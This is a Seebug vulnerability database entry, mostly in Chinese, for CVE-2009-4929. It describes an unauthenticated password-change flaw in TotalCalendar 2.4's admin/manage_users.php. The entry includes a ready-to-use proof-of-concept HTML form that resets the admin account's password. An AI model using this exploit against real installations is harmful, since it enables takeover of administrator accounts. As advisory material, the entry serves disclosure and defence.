Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19955
HistoryJul 15, 2010 - 12:00 a.m.

TotalCalendar manage_users.php页面非授权更改口令漏洞

2010-07-1500:00:00
Root
www.seebug.org
11

0.009 Low

EPSS

Percentile

82.8%

JSON

BUGTRAQ ID: 34619
CVE ID: CVE-2009-4929

TotalCalendar是一种基于Web的日程管理系统。

TotalCalendar的admin/manage_users.php页面没有强制管理认证,远程用户可以通过在HTTP请求中包含newPW1和 newPW2参数任意更改口令。

SweetPHP TotalCalendar 2.4
厂商补丁:

SweetPHP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sweetphp.com/nuke/modules.php?name=Script_Preview&script=12


                                                <title> Powered by: TotalCalendar 2.4 Remote Password Change </title>
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
  
    </tr>
  </table>
  </td>
   </tr>
   <tr>
     <td style="padding: 0px;">
  <table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
    <tr>
  
   <td height="100%" style="padding: 0px;">
<div align="left" id="25_content_area" style="">
  <script language="javascript">
  // Should we show the pw changing fields or not
  function pwChanger(bool)
  {
   if(bool)
   {
    // Show password changer
    document.getElementById('pwChange').style.display = "none";
    document.getElementById('pwDontChange').style.display = "";
    document.getElementById('pwChangerArea').style.display = "";
    document.getElementById('changePW').value = 1;
   }
   else
   {
    // Hide password changer
    document.getElementById('pwChange').style.display = "";
    document.getElementById('pwDontChange').style.display = "none";
    document.getElementById('pwChangerArea').style.display = "none";
    document.getElementById('changePW').value = 0;
   }
  }
  </script>
  <br /<br /><br /><form method="POST" action="http://www.example.com/calendar/admin/manage_users.php"><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
  <table align="center">
    <tr>
      <td align="right" valign="top"><b>First Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Last Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Username:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Email Address:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="email" value="[email protected]" size="40" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChange">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
    </tr>
    <tr id="pwDontChange" style="display: none;">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChangerArea" style="display: none;">
      <td colspan="3">
   <table width="100%">
     <tr>
    <td align="right" valign="top"><b>New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
     </tr>
     <tr>
    <td align="right" valign="top"><b>Confirm New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
     </tr>
     <tr>
    <td colspan="3"> </td>
     </tr>
   </table>
      </td>
    </tr>
    <tr>
      <td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
    </tr>
  </table></form><br /></div></td>

Related

cvelist 1
nvd 1
prion 1
cve 1
cvelist
cvelist
CVE-2009-4929
2010-07-09 17:00:00
nvd
nvd
CVE-2009-4929
2010-07-12 13:27:16
prion
prion
Authentication flaw
2010-07-12 13:27:00
cve
cve
CVE-2009-4929
2010-07-12 13:27:16

0.009 Low

EPSS

Percentile

82.8%

JSON
Related for SSV:19955
cvelist1nvd1prion1cve1